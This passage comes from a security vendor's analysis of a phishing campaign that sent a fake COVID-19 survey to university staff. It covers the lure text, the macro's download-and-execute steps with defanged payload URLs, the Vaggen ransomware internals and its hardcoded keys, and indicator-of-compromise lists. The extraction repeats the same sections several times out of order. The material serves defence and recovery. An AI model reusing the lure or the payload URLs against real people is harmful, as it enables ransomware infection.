tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2726 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2727 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2728 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2729 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2730 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2731 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2732 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2733 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2734 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2735 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2736 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2737 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2738 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2739 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2740 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2741 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2742 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2743 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2744 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2745 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2746 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2747 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2748 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2749 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2750 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2751 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2752 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2753 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2754 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2755 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2756 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2757 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2758 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2759 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared 